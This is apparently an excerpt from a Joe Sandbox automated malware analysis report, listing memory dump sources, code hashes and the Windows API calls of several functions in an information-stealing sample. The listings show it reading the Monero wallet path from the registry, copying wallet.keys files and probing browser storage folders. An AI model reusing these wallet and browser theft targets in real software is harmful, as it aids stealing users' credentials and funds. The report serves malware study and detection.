                          • Source File: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: `o_
                          • API String ID: 0-1224030902
                          • Opcode ID: 6743614ec630975aa93cb1943e8527d4bbe96c70d516b9394860726da677aa50
                          • Instruction ID: 5d3928dfdca34cd0bb64e83a8140088e5a7fa02882e217614d01d0456cc9d7fd
                          • Opcode Fuzzy Hash: 6743614ec630975aa93cb1943e8527d4bbe96c70d516b9394860726da677aa50
                          • Instruction Fuzzy Hash: 4451F0F250C70CDBDB007E289C4167AB6E4FB94708F2A893D9AC6C6704F6315844A78F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9f9f4a471513bcc76dd1e77217208f2fc92d7a68117ba153ff6983aa8b03e9c5
                          • Instruction ID: 3d0856532a22b2e91b37a8f0fe54b5dd2cddaaab84254c04510655fa1a50a3d6
                          • Opcode Fuzzy Hash: 9f9f4a471513bcc76dd1e77217208f2fc92d7a68117ba153ff6983aa8b03e9c5
                          • Instruction Fuzzy Hash: 775158F3E046144BE3106E3DDD88716BAE6EBD4220F2F8639DA98D7798E57558058282
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0f363981e2f2f334949bfac1ef7fe115bc398822f780bd43501fc050070e995b
                          • Instruction ID: d94281be39992869d4fbe24714932dcd15f0d9d38b38c4231f6201558c475482
                          • Opcode Fuzzy Hash: 0f363981e2f2f334949bfac1ef7fe115bc398822f780bd43501fc050070e995b
                          • Instruction Fuzzy Hash: 715123F7A085005FE708AE29DC5577AB6D6EBC4320F2A853DEAC5D7784E9359C048292
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dfd29b3e74f4d016cbf9575fdc3ecc573f916055d0551c81b824549b21970e23
                          • Instruction ID: d97e064146ae12cbacb83817e1e6f0918c3bf74b62ce4ebfacf8d6202af945f5
                          • Opcode Fuzzy Hash: dfd29b3e74f4d016cbf9575fdc3ecc573f916055d0551c81b824549b21970e23
                          • Instruction Fuzzy Hash: 634127B3A182144FF3086A39EC95767B7D6DBC4320F2B493DDB84D7780ED7898094696
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9018785e7848dcd4b044dfd18ead7f352cb6e2c85ba6b35b42a718808c0d8fdd
                          • Instruction ID: 1f74744df6f5a7d6337359c50d35a81eeeaadd5f9661804a7114ff8c533c7c60
                          • Opcode Fuzzy Hash: 9018785e7848dcd4b044dfd18ead7f352cb6e2c85ba6b35b42a718808c0d8fdd
                          • Instruction Fuzzy Hash: 7B51B0B26083109FE304AF69EC847AAFBE4FF44720F1A493DEAC493740D67958458B97
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00418636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 004186AA
                          • StrStrA.SHLWAPI(?,00FBDD38), ref: 004186CF
                          • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 004186EE
                          • lstrlen.KERNEL32(?), ref: 00418701
                          • wsprintfA.USER32 ref: 00418711
                          • lstrcpy.KERNEL32(?,?), ref: 00418727
                          • StrStrA.SHLWAPI(?,00FBDF90), ref: 00418754
                          • lstrcpy.KERNEL32(?,006393D0), ref: 004187B4
                          • StrStrA.SHLWAPI(?,00FBDF78), ref: 004187E1
                          • lstrcpyn.KERNEL32(006393D0,?,00000000), ref: 00418800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 565a4cd9b0e4bcb21391a8c8fb1a17f51842d8d52a1eb9a055250aba843f9c2c
                          • Instruction ID: 70e839b95ede5b8f178571d91a8d5e2f23433e766b8548953c5dacf9730c6cf5
                          • Opcode Fuzzy Hash: 565a4cd9b0e4bcb21391a8c8fb1a17f51842d8d52a1eb9a055250aba843f9c2c
                          • Instruction Fuzzy Hash: ABF15C71A00614AFDB10DB68DD48ADAB7BAEF88300F144559F909E3351DBB4AE45CFE4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401F9F
                          • lstrlen.KERNEL32(00FB8B30), ref: 00401FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00401FE3
                          • lstrlen.KERNEL32(00431794), ref: 00401FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040200E
                          • lstrcat.KERNEL32(00000000,00431794), ref: 0040201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00402042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0040204D
                          • lstrlen.KERNEL32(00431794), ref: 00402058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402075
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004020AC
                          • lstrlen.KERNEL32(?), ref: 004020E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402104
                          • lstrcat.KERNEL32(00000000,?), ref: 00402112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402139
                          • lstrlen.KERNEL32(00431794), ref: 0040214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040216B
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00402177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004021A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004021D4
                          • lstrlen.KERNEL32(?), ref: 004021EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00402218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402242
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040227F
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004022B1
                          • lstrcat.KERNEL32(00000000,00FBCFE0), ref: 004022B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004022F7
                          • lstrcat.KERNEL32(00000000), ref: 00402304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00402356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00402382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004023BF
                          • DeleteFileA.KERNEL32(00000000), ref: 004023F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00402444
                          • FindClose.KERNEL32(00000000), ref: 00402453
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: 3ef745759e559b95ce9c0926d959cffad3ceca5b2ca35f7e6a40af200e4673fc
                          • Instruction ID: 7f0108977519a7202947b0206e488898bab42644744f99ad0bdbb35b15ebe32d
                          • Opcode Fuzzy Hash: 3ef745759e559b95ce9c0926d959cffad3ceca5b2ca35f7e6a40af200e4673fc
                          • Instruction Fuzzy Hash: D6E14D71B102169BCB21AF75DE89A9F77B9AF04304F04507AF805B72D1DBB8DD058BA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416445
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00416480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 004164AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004164E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0041650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00416537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: 80642b8a0cf295fddfad45bc09744f060e10240317099413a1982c42e378211c
                          • Instruction ID: 89bcf9e358dd96d710254da3b8b6b538765559704cebe026861228018a21bd1d
                          • Opcode Fuzzy Hash: 80642b8a0cf295fddfad45bc09744f060e10240317099413a1982c42e378211c
                          • Instruction Fuzzy Hash: B0F19D70A012159BCB21AF79DD89AAF77B9AF40304F05402AB815A73D1DB7CDC85CFA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004143A3
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004143D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 004143FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00414414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0041443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00414471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414498
                          • lstrcpy.KERNEL32(00000000,?), ref: 004144D7
                          • lstrcat.KERNEL32(00000000,?), ref: 004144DF
                          • lstrlen.KERNEL32(00431794), ref: 004144EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00414507
                          • lstrcat.KERNEL32(00000000,00431794), ref: 00414513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0041451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041453B
                          • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 00414547
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041456E
                          • lstrcpy.KERNEL32(00000000,?), ref: 004145A0
                          • GetFileAttributesA.KERNEL32(00000000), ref: 004145A7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414601
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041462A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00414653
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041467B
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004146AF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                          • String ID: .metadata-v2$\storage\default\
                          • API String ID: 1033685851-762053450
                          • Opcode ID: d9d7684133ca192ce360dcdbf0583e7857a5560f3789b52cf9a03aaccf1d0578
                          • Instruction ID: 9719116f80c923dde82e11cb9c7d465f57478066ed72e928f9e3dad62e1dd44b
                          • Opcode Fuzzy Hash: d9d7684133ca192ce360dcdbf0583e7857a5560f3789b52cf9a03aaccf1d0578
                          • Instruction Fuzzy Hash: CCB18170B112069BCB21EF79DE89A9F77A9AF44304F04103AB805E7291DF7CDC458BA8
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004157D5
                          • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00415804
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415835
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041585D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415868
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415890
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004158C8
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004158D3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004158F8
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0041592E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415956
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415961
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415988
                          • lstrlen.KERNEL32(00431794), ref: 0041599A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004159B9
                          • lstrcat.KERNEL32(00000000,00431794), ref: 004159C5
                          • lstrlen.KERNEL32(00FBCF80), ref: 004159D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004159F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00415A02
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415A2C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415A58
                          • GetFileAttributesA.KERNEL32(00000000), ref: 00415A5F
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415AB7
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B2D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B56
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415B89
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415BB5
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00415BEF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00415C4C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00415C70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2428362635-0
                          • Opcode ID: eca8acabcf741f8b3cf38b95802c8dd6a918646a14f7c24f35edd9d23cabb5b5
                          • Instruction ID: 71293e4b19a62bf970015fdbd7abc1fdb06261af6d5437264a10b1e2c9ba866e
                          • Opcode Fuzzy Hash: eca8acabcf741f8b3cf38b95802c8dd6a918646a14f7c24f35edd9d23cabb5b5
                          • Instruction Fuzzy Hash: 1D029D70A11605DFCB21EF69C989AEF7BB5AF84304F14412AF805A7390DB78DC85CB98
                          APIs
                            • Part of subcall function 00401120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00401135
                            • Part of subcall function 00401120: RtlAllocateHeap.NTDLL(00000000), ref: 0040113C
                            • Part of subcall function 00401120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00401159
                            • Part of subcall function 00401120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401173
                            • Part of subcall function 00401120: RegCloseKey.ADVAPI32(?), ref: 0040117D
                          • lstrcat.KERNEL32(?,00000000), ref: 004011C0
                          • lstrlen.KERNEL32(?), ref: 004011CD
                          • lstrcat.KERNEL32(?,.keys), ref: 004011E8
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 0040121F
                          • lstrlen.KERNEL32(00FB8B30), ref: 0040122D
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401251
                          • lstrcat.KERNEL32(00000000,00FB8B30), ref: 00401259
                          • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 00401264
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401288
                          • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 00401294
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004012BA
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004012FF
                          • lstrlen.KERNEL32(00FBCFE0), ref: 0040130E
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401335
                          • lstrcat.KERNEL32(00000000,?), ref: 0040133D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00401378
                          • lstrcat.KERNEL32(00000000), ref: 00401385
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004013AC
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 004013D5
                          • lstrcpy.KERNEL32(00000000,?), ref: 00401401
                          • lstrcpy.KERNEL32(00000000,?), ref: 0040143D
                            • Part of subcall function 0041EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0041EE12
                          • DeleteFileA.KERNEL32(?), ref: 00401471
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                          • String ID: .keys$\Monero\wallet.keys
                          • API String ID: 2881711868-3586502688
                          • Opcode ID: c6a36046e304ca859151f621e31f93dd328c32381cdb5c96bc049a6a5951fb6d
                          • Instruction ID: 4c8ff00ee4ac2f0ff241658e7160f53788a0b9240742c0c39d6cbbc9ea41ad1c
